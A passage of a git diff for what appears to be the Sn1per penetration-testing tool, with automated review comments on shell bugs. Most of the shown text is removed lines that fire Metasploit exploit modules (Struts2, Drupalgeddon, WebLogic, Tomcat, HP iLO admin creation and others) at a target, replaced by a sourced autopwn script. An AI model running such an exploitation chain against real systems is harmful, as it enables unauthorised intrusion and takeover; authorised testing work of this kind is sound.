- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_jsp_upload_bypass.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_namespace_ognl.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_directory_traversal.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
+ SSL="false"
+ source modes/web_autopwn.sh
 fi
 source modes/osint_stage_2.sh
 fi
diff --git a/modes/webporthttps.sh b/modes/webporthttps.sh
index 2f9f64c3..1f46810d 100644
--- a/modes/webporthttps.sh
+++ b/modes/webporthttps.sh
@@ -14,8 +14,8 @@ if [ "$MODE" = "webporthttps" ]; then
 mkdir $LOOT_DIR/scans 2> /dev/null
 mkdir $LOOT_DIR/output 2> /dev/null
 fi
- echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE-$PORT-`date +%Y%m%d%H%M`.txt
- sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-$PORT-`date +%Y%m%d%H%M`.txt 2>&1
+ echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
+ sniper -t $TARGET -m $MODE -p $PORT --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-`date +%Y%m%d%H%M`.txt 2>&1
 exit
 fi
 echo -e "$OKRED ____ $RESET"
@@ -26,7 +26,7 @@ if [ "$MODE" = "webporthttps" ]; then
 echo -e "$OKRED /_/ $RESET"
 echo -e "$RESET"
 echo -e "$OKORANGE + -- --=[https://xerosecurity.com"
- echo -e "$OKORANGE + -- --=[Sn1per v$VER by 1N3"
+ echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz"
 echo -e ""
 echo -e ""
 echo -e " ; , "
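Review bot: `source modes/web_autopwn.sh` is resolved relative to the current working directory, so it only works because of the `cd $INSTALL_DIR` a few lines earlier in this hunk; if that `cd` is ever moved, or a tool wrapper above it changes directory and does not return, the exploitation stage dies with a "No such file" from `source` and the scan carries on as if it ran. Anchor it on the variable already in scope: `source $INSTALL_DIR/modes/web_autopwn.sh`. `SSL="false"` is a plain shell variable used to steer the sourced file, and because the file is sourced rather than executed, everything web_autopwn.sh assigns leaks back into this script — worth a one-line comment at the assignment, e.g. `# read by web_autopwn.sh (sourced, so its variables persist here)`. The inline modules being removed carried several defects (hard-coded `set RPORT 80` ignoring `$PORT` in the badblue, php_cgi, joomla, wordpress and weblogic-wsat calls, the `multi/htp/phpmyadmin_preg_replace` path typo, the oscommerce banner labelled CVE-2018-2628); web_autopwn.sh is not in this chunk, so please confirm they were not carried across verbatim.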
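Review bot: In the new `sniper ... | tee ... 2>&1` line of the webporthttps workspace branch the `2>&1` applies to `tee`, not to `sniper`, so scan errors never land in `sniper-$TARGET-$MODE-$PORT-….txt`; the redirection belongs before the pipe: `sniper -t $TARGET -m $MODE -p $PORT --noreport $args 2>&1 | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-$PORT-$(date +%Y%m%d%H%M).txt`. The companion scan-log write switched to `>> $LOOT_DIR/scans/$TARGET-$MODE.txt`, so one file now accumulates a line per run; a short comment saying that is deliberate would stop it being "fixed" later. The `if` enclosing these lines starts outside the hunk.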
@@ -66,7 +66,7 @@ if [ "$MODE" = "webporthttps" ]; then
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
- nmap -sV -T5 -Pn -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-https-$TARGET.xml
+ nmap -sV -Pn -p $PORT --open $TARGET -oX $LOOT_DIR/nmap/nmap-https-$TARGET.xml
 port_https=`grep 'portid="'$PORT'"' $LOOT_DIR/nmap/nmap-https-$TARGET.xml | grep open`
 if [ -z "$port_https" ]; then
@@ -102,6 +102,12 @@ if [ "$MODE" = "webporthttps" ]; then
 wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET-$PORT.txt 2> /dev/null
 curl --connect-timeout 5 -I -s -R https://$TARGET:$PORT | tee $LOOT_DIR/web/headers-https-$TARGET-$PORT.txt 2> /dev/null
 curl --connect-timeout 5 -I -s -R -L https://$TARGET:$PORT | tee $LOOT_DIR/web/websource-https-$TARGET-$PORT.txt 2> /dev/null
+ if [ "$WEBTECH" = "1" ]; then
+ echo -e "${OKGREEN}====================================================================================${RESET}"
+ echo -e "$OKRED GATHERING WEB FINGERPRINT $RESET"
+ echo -e "${OKGREEN}====================================================================================${RESET}"
+ webtech -u https://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https-port$PORT.txt
+ fi
 echo -e "${OKGREEN}====================================================================================${RESET}"
 echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
 echo -e "${OKGREEN}====================================================================================${RESET}"
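Review bot: The rewritten nmap line still writes its XML to `$LOOT_DIR/nmap/nmap-https-$TARGET.xml` with no port in the name, so scanning a second HTTPS port on the same target overwrites the first run's XML, and the `port_https=` grep on the following line then reads whichever scan finished last. Naming the artifact per port keeps them apart: `-oX $LOOT_DIR/nmap/nmap-https-$TARGET-$PORT.xml`, with the same path in the `port_https=` line (the other web-scan outputs in this file already carry `$PORT`). Dropping `-T5` silently changes nmap's timing template to the default, which is a deliberate slowdown that readers cannot infer from the line; a one-line comment stating the reason (presumably accuracy against slow or rate-limited hosts, which I cannot confirm from here) would help. The enclosing `if` starts outside the hunk.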
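Review bot: The new HTTPS WEBTECH block has no timeout, unlike the `wget --connect-timeout`/`curl --connect-timeout` fetches right above it, so a TLS port that accepts the connection and then stalls blocks the whole web scan; if webtech lacks a timeout flag, `timeout 120 webtech -u https://$TARGET:$PORT | grep \- | cut -d- -f2- | tee $LOOT_DIR/web/webtech-$TARGET-https-port$PORT.txt` bounds it with coreutils. It also never checks that `webtech` is installed, so on a host without it the branch prints "command not found" and `tee` leaves an empty `webtech-$TARGET-https-port$PORT.txt` behind; `if [ "$WEBTECH" = "1" ] && command -v webtech >/dev/null 2>&1; then` avoids the false artifact. This block sits inside an `if` that starts outside the hunk.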
@@ -239,166 +245,8 @@ if [ "$MODE" = "webporthttps" ]; then
 fi
 cd $INSTALL_DIR
 if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
-
-
-
-
-
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null
-
-
-
-
-
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
- rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
- echo -e "${OKGREEN}====================================================================================${RESET}"
- echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
- echo -e "${OKGREEN}====================================================================================${RESET}"
- msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false;
run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-wordpress_content_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw > 
$LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_content_type_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_rest_xstream.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-struts2_code_exec_showcase.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET" - echo -e 
